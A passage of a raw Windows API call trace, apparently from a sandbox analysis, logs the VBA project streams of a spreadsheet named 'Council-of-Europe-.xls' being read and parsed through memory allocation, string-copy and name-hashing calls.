lpUsedDefaultChar=0x0 | out: lpMultiByteStr="036078a635", lpUsedDefaultChar=0x0) returned 11 [0155.503] strcpy_s (in: _Dst=0x9808ad8, _DstSize=0x7, _Src="Sheet1" | out: _Dst="Sheet1") returned 0x0 [0155.503] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9a72e90, cb=0x138) returned 0xa0f0900 [0155.503] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0155.503] wcscpy_s (in: _Destination=0xa14bae8, _SizeInWords=0x7, _Source="Sheet1" | out: _Destination="Sheet1") returned 0x0 [0155.503] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0155.503] wcscpy_s (in: _Destination=0xa14baf8, _SizeInWords=0x7, _Source="Sheet1" | out: _Destination="Sheet1") returned 0x0 [0155.503] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9922b70, cb=0x36) returned 0x7c55fd0 [0155.503] IMalloc:Realloc (This=0x7fefecb5380, pv=0x78de6f0, cb=0x12) returned 0x7f0a2e0 [0155.504] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x54) returned 0x9bc3230 [0155.504] IMalloc:Free (This=0x7fefecb5380, pv=0x7eb47b0) [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9922b70 [0155.504] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9922b70, cb=0x80) returned 0x9c93c00 [0155.504] IMalloc:Free (This=0x7fefecb5380, pv=0x9bc3230) [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x3d0) returned 0xa199d30 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9922b70 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x78de6f0 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93c90 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066eb0 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066ed0 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x688) returned 0x985cb10 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93d20 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x640) returned 0xa166af0 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991f4b0 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066ee0 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066ef0 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991f150 [0155.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93db0 [0155.504] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0155.504] wcsncpy_s (in: _Destination=0x1cf770, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.504] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf6a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.504] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.505] CExposedStream::Seek () returned 0x0 [0155.505] CExposedStream::AddRef () returned 0x2 [0155.505] CExposedStream::Read () returned 0x0 [0155.505] CExposedStream::AddRef () returned 0x3 [0155.505] CExposedStream::Release () returned 0x2 [0155.505] IMalloc:Alloc (This=0x7fefecb5380, cb=0x2ee0) returned 0xa1dc1f0 [0155.505] CExposedStream::Read () returned 0x0 [0155.505] CExposedStream::Read () returned 0x0 [0155.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0155.505] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa066f00 [0155.505] IMalloc:Alloc (This=0x7fefecb5380, cb=0xe) returned 0x7efce40 [0155.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa066f00, cbMultiByte=7, lpWideCharStr=0x7efce40, cchWideChar=7 | out: lpWideCharStr="Sheet1") returned 7 [0155.505] IMalloc:Free (This=0x7fefecb5380, pv=0xa066f00) [0155.505] IMalloc:Free (This=0x7fefecb5380, pv=0x7efce40) [0155.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0155.506] IMalloc:Alloc (This=0x7fefecb5380, cb=0x28) returned 0x991f090 [0155.506] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x9bc3230 [0155.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x991f090, cbMultiByte=40, lpWideCharStr=0x9bc3230, cchWideChar=40 | out: lpWideCharStr="0{00020820-0000-0000-C000-000000000046}") returned 40 [0155.506] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x9bc3170 [0155.506] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa066eb0, cb=0x20) returned 0x991f060 [0155.506] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa066ee0, cb=0x28) returned 0x991f030 [0155.506] IMalloc:Free (This=0x7fefecb5380, pv=0x991f090) [0155.506] IMalloc:Free (This=0x7fefecb5380, pv=0x9bc3230) [0155.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0155.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0155.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0155.508] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.508] CExposedStream::Read () returned 0x0 [0155.508] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa1dc1f0, cb=0x258) returned 0xa1dc1f0 [0155.508] CExposedStream::Release () returned 0x1 [0155.508] CExposedStream::Release () returned 0x0 [0155.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=7, lpMultiByteStr=0x1cf9d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0155.508] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0155.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=7, lpMultiByteStr=0x1cfb10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0155.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0155.509] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7f05340, cb=0x20) returned 0x991f090 [0155.509] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93e40 [0155.509] IMalloc:GetSize (This=0x7fefecb5380, pv=0x9c93e40) returned 0x80 [0155.509] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac18d0 [0155.509] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac1990 [0155.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=7, lpMultiByteStr=0x1cf9d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0155.509] CoCreateGuid (in: pguid=0x1cf700 | out: pguid=0x1cf700*(Data1=0x9a88c810, Data2=0x5b84, Data3=0x4b1c, Data4=([0]=0xa1, [1]=0xfb, [2]=0xdb, [3]=0xd7, [4]=0x81, [5]=0x2f, [6]=0xd2, [7]=0xcc))) returned 0x0 [0155.509] CoCreateGuid (in: pguid=0x1cf710 | out: pguid=0x1cf710*(Data1=0x74be8437, Data2=0xe55f, Data3=0x4215, Data4=([0]=0x89, [1]=0x80, [2]=0x6, [3]=0x4, [4]=0x3c, [5]=0x6a, [6]=0x9c, [7]=0xa1))) returned 0x0 [0155.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=7, lpMultiByteStr=0x1cf720, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0155.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0155.509] GetLocalTime (in: lpSystemTime=0x1cf5f8 | out: lpSystemTime=0x1cf5f8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x2d, wMilliseconds=0x392)) [0155.509] _ultow_s (in: _Value=0x6078a635, _Buffer=0xa14bb0c, _BufferCount=0x9, _Radix=16 | out: _Buffer="6078a635") returned 0x0 [0155.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="046078a635", cchWideChar=11, lpMultiByteStr=0x1cf590, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="046078a635", lpUsedDefaultChar=0x0) returned 11 [0155.509] strcpy_s (in: _Dst=0x9808ae8, _DstSize=0x7, _Src="Sheet2" | out: _Dst="Sheet2") returned 0x0 [0155.509] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa0f0900, cb=0x1a0) returned 0x99f7b00 [0155.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0155.509] wcscpy_s (in: _Destination=0xa14bb20, _SizeInWords=0x7, _Source="Sheet2" | out: _Destination="Sheet2") returned 0x0 [0155.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0155.509] wcscpy_s (in: _Destination=0xa14bb30, _SizeInWords=0x7, _Source="Sheet2" | out: _Destination="Sheet2") returned 0x0 [0155.509] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7c55fd0, cb=0x48) returned 0x5136cf0 [0155.509] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7f0a2e0, cb=0x18) returned 0x7f05340 [0155.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0155.509] IMalloc:Alloc (This=0x7fefecb5380, cb=0x60) returned 0x96a18b0 [0155.509] IMalloc:Free (This=0x7fefecb5380, pv=0x9c93c00) [0155.509] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991efd0 [0155.509] IMalloc:Realloc (This=0x7fefecb5380, pv=0x991efd0, cb=0x8c) returned 0xa15f6b0 [0155.510] IMalloc:Free (This=0x7fefecb5380, pv=0x96a18b0) [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x3d0) returned 0xa19a120 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991efd0 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f0a2e0 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93c00 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066ee0 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066eb0 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x688) returned 0x985d1a0 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93ed0 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x640) returned 0xa167140 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991ef40 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066f00 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066f10 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991ed30 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93f60 [0155.510] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0155.510] wcsncpy_s (in: _Destination=0x1cf770, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.510] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf6a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.510] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.510] CExposedStream::Seek () returned 0x0 [0155.510] CExposedStream::AddRef () returned 0x2 [0155.510] CExposedStream::Read () returned 0x0 [0155.510] CExposedStream::AddRef () returned 0x3 [0155.510] CExposedStream::Release () returned 0x2 [0155.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x2ee0) returned 0xa1dc460 [0155.510] CExposedStream::Read () returned 0x0 [0155.510] CExposedStream::Read () returned 0x0 [0155.510] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0155.511] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa066f20 [0155.511] IMalloc:Alloc (This=0x7fefecb5380, cb=0xe) returned 0x7efce40 [0155.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa066f20, cbMultiByte=7, lpWideCharStr=0x7efce40, cchWideChar=7 | out: lpWideCharStr="Sheet2") returned 7 [0155.511] IMalloc:Free (This=0x7fefecb5380, pv=0xa066f20) [0155.511] IMalloc:Free (This=0x7fefecb5380, pv=0x7efce40) [0155.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0155.511] IMalloc:Alloc (This=0x7fefecb5380, cb=0x28) returned 0x991ee80 [0155.511] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x9bc3230 [0155.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x991ee80, cbMultiByte=40, lpWideCharStr=0x9bc3230, cchWideChar=40 | out: lpWideCharStr="0{00020820-0000-0000-C000-000000000046}") returned 40 [0155.511] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x9bc3110 [0155.511] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa066ee0, cb=0x20) returned 0x991eac0 [0155.511] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa066f00, cb=0x28) returned 0x991ea60 [0155.511] IMalloc:Free (This=0x7fefecb5380, pv=0x991ee80) [0155.511] IMalloc:Free (This=0x7fefecb5380, pv=0x9bc3230) [0155.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0155.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0155.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0155.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0155.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.513] CExposedStream::Read () returned 0x0 [0155.513] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa1dc460, cb=0x258) returned 0xa1dc460 [0155.513] CExposedStream::Release () returned 0x1 [0155.513] CExposedStream::Release () returned 0x0 [0155.514] CExposedStream::Release () returned 0x0 [0155.514] IMalloc:Free (This=0x7fefecb5380, pv=0xa12c0f0) [0155.514] IMalloc:Free (This=0x7fefecb5380, pv=0xa12a0c0) [0155.514] IMalloc:Free (This=0x7fefecb5380, pv=0xa1cb790) [0155.514] IMalloc:Free (This=0x7fefecb5380, pv=0xa1c9760) [0155.514] IMalloc:Free (This=0x7fefecb5380, pv=0x7db6e90) [0155.514] malloc (_Size=0x168) returned 0x48a7a30 [0155.514] malloc (_Size=0x20) returned 0xc50df20 [0155.514] lstrcpyA (in: lpString1=0x48a7a7c, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0155.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48a7a7c, cbMultiByte=-1, lpWideCharStr=0x1d0db0, cchWideChar=8 | out: lpWideCharStr="PROJECT") returned 8 [0155.515] malloc (_Size=0x138) returned 0x48a7ba0 [0155.515] CExposedStream::Stat () returned 0x0 [0155.515] malloc (_Size=0x20d) returned 0x48a7ce0 [0155.515] CExposedStream::Read () returned 0x0 [0155.515] malloc (_Size=0x28) returned 0x48a7f30 [0155.515] malloc (_Size=0x20) returned 0x48a7f60 [0155.515] lstrlenA (lpString="") returned 0 [0155.515] lstrcpyA (in: lpString1=0xc50df50, lpString2="" | out: lpString1="") returned="" [0155.515] malloc (_Size=0x28) returned 0x48a7f90 [0155.515] malloc (_Size=0x20) returned 0x48a7fc0 [0155.515] lstrlenA (lpString="") returned 0 [0155.515] lstrcpyA (in: lpString1=0xc50df90, lpString2="" | out: lpString1="") returned="" [0155.515] malloc (_Size=0x28) returned 0x48a7ff0 [0155.515] malloc (_Size=0x20) returned 0x48a8020 [0155.515] lstrlenA (lpString="") returned 0 [0155.515] lstrcpyA (in: lpString1=0x48a8b00, lpString2="" | out: lpString1="") returned="" [0155.515] malloc (_Size=0x28) returned 0x48a8050 [0155.515] malloc (_Size=0x20) returned 0x48a8080 [0155.516] lstrlenA (lpString="") returned 0 [0155.516] lstrcpyA (in: lpString1=0x48a8b40, lpString2="" | out: lpString1="") returned="" [0155.516] malloc (_Size=0x120) returned 0x48a8b80 [0155.516] lstrcpynA (in: lpString1=0x48a8ba0, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0155.516] malloc (_Size=0x120) returned 0x48a8cb0 [0155.517] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0155.517] malloc (_Size=0x36) returned 0x48a8de0 [0155.517] lstrcpyA (in: lpString1=0x48a8de0, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0155.517] malloc (_Size=0x120) returned 0x48a8e20 [0155.517] lstrcpynA (in: lpString1=0x48a8e40, lpString2="Workspace", iMaxLength=256 | out: lpString1="Workspace") returned="Workspace" [0155.517] malloc (_Size=0x120) returned 0x48a8f50 [0155.517] lstrlenA (lpString="26, 26, 1446, 676, ") returned 19 [0155.517] malloc (_Size=0x14) returned 0x48a9080 [0155.517] lstrcpyA (in: lpString1=0x48a9080, lpString2="26, 26, 1446, 676, " | out: lpString1="26, 26, 1446, 676, ") returned="26, 26, 1446, 676, " [0155.517] malloc (_Size=0x120) returned 0x48a90a0 [0155.518] lstrlenA (lpString="52, 52, 1472, 702, Z") returned 20 [0155.518] malloc (_Size=0x15) returned 0x48a9200 [0155.518] lstrcpyA (in: lpString1=0x48a9200, lpString2="52, 52, 1472, 702, Z" | out: lpString1="52, 52, 1472, 702, Z") returned="52, 52, 1472, 702, Z" [0155.518] malloc (_Size=0x120) returned 0x48a99d0 [0155.518] lstrlenA (lpString="0, 0, 0, 0, C") returned 13 [0155.518] malloc (_Size=0xe) returned 0x48a9220 [0155.518] lstrcpyA (in: lpString1=0x48a9220, lpString2="0, 0, 0, 0, C" | out: lpString1="0, 0, 0, 0, C") returned="0, 0, 0, 0, C" [0155.518] malloc (_Size=0x120) returned 0x48a9b00 [0155.518] lstrlenA (lpString="0, 0, 0, 0, C") returned 13 [0155.518] malloc (_Size=0xe) returned 0x48a9240 [0155.518] lstrcpyA (in: lpString1=0x48a9240, lpString2="0, 0, 0, 0, C" | out: lpString1="0, 0, 0, 0, C") returned="0, 0, 0, 0, C" [0155.519] CExposedStream::Stat () returned 0x0 [0155.519] malloc (_Size=0x6b) returned 0x48a9c30 [0155.519] CExposedStream::Read () returned 0x0 [0155.519] CExposedStream::Release () returned 0x0 [0155.519] lstrcpyA (in: lpString1=0xc50df70, lpString2="" | out: lpString1="") returned="" [0155.519] malloc (_Size=0x180) returned 0x48a9cb0 [0155.519] lstrcmpiA (lpString1="Module1", lpString2="Module1") returned 0 [0155.519] lstrlenA (lpString="Module1") returned 7 [0155.519] malloc (_Size=0xa8) returned 0x48a9e60 [0155.519] lstrcpyA (in: lpString1=0xc50dfb0, lpString2="" | out: lpString1="") returned="" [0155.519] malloc (_Size=0x188) returned 0x48a9f10 [0155.521] lstrcmpiA (lpString1="ThisWorkbook", lpString2="ThisWorkbook") returned 0 [0155.521] lstrlenA (lpString="ThisWorkbook") returned 12 [0155.521] malloc (_Size=0xa8) returned 0x48aa0a0 [0155.521] lstrcpyA (in: lpString1=0x48a8b20, lpString2="" | out: lpString1="") returned="" [0155.521] malloc (_Size=0x188) returned 0x48aa150 [0155.521] lstrcmpiA (lpString1="Sheet1", lpString2="Sheet1") returned 0 [0155.521] lstrlenA (lpString="Sheet1") returned 6 [0155.521] malloc (_Size=0xa8) returned 0x48aa300 [0155.522] lstrcpyA (in: lpString1=0x48a8b60, lpString2="" | out: lpString1="") returned="" [0155.522] malloc (_Size=0x188) returned 0x48aa3b0 [0155.522] lstrcmpiA (lpString1="Sheet2", lpString2="Sheet2") returned 0 [0155.522] lstrlenA (lpString="Sheet2") returned 6 [0155.522] malloc (_Size=0xa8) returned 0x48aa940 [0155.522] free (_Block=0x48a9c30) [0155.522] atoi (_Str="393222000") returned 393222000 [0155.522] lstrcpynA (in: lpString1=0xc50cb2c, lpString2="{BC7694C0-C11A-45C5-BEF9-A835CCA97F32}", iMaxLength=39 | out: lpString1="{BC7694C0-C11A-45C5-BEF9-A835CCA97F32}") returned="{BC7694C0-C11A-45C5-BEF9-A835CCA97F32}" [0155.522] StringFromGUID2 (in: rguid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lpsz=0x9a718b8, cchMax=39 | out: lpsz="{00000000-0000-0000-0000-000000000000}") returned 39 [0155.522] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{BC7694C0-C11A-45C5-BEF9-A835CCA97F32}") returned -1 [0155.522] lstrlenA (lpString="{BC7694C0-C11A-45C5-BEF9-A835CCA97F32}") returned 38 [0155.522] malloc (_Size=0x4) returned 0x48aa580 [0155.523] free (_Block=0x48aa580) [0155.523] lstrlenA (lpString="{BC7694C0-C11A-45C5-BEF9-A835CCA97F32}") returned 38 [0155.523] malloc (_Size=0x1) returned 0x48aa580 [0155.523] free (_Block=0x48aa580) [0155.523] lstrlenA (lpString="{BC7694C0-C11A-45C5-BEF9-A835CCA97F32}") returned 38 [0155.523] malloc (_Size=0x1) returned 0x48aa580 [0155.523] free (_Block=0x48aa580) [0155.523] free (_Block=0x48a7ce0) [0155.523] free (_Block=0xc50df70) [0155.523] free (_Block=0xc50df50) [0155.523] free (_Block=0x48a7f60) [0155.523] free (_Block=0x48a7f30) [0155.523] free (_Block=0xc50dfb0) [0155.523] free (_Block=0xc50df90) [0155.523] free (_Block=0x48a7fc0) [0155.523] free (_Block=0x48a7f90) [0155.523] free (_Block=0x48a8b20) [0155.523] free (_Block=0x48a8b00) [0155.523] free (_Block=0x48a8020) [0155.523] free (_Block=0x48a7ff0) [0155.523] free (_Block=0x48a8b60) [0155.523] free (_Block=0x48a8b40) [0155.523] free (_Block=0x48a8080) [0155.523] free (_Block=0x48a8050) [0155.523] free (_Block=0x48a7ba0) [0155.523] CExposedStream::Commit () returned 0x0 [0155.523] CExposedStream::Release () returned 0x0 [0155.524] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0155.526] lstrlenA (lpString="&H00000001") returned 10 [0155.526] malloc (_Size=0xb) returned 0x48a9280 [0155.526] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0155.526] lstrcmpiA (lpString1="&H00000001", lpString2="&H00000001") returned 0 [0155.526] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0155.526] malloc (_Size=0x36) returned 0x48a8b00 [0155.526] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0155.526] malloc (_Size=0x68) returned 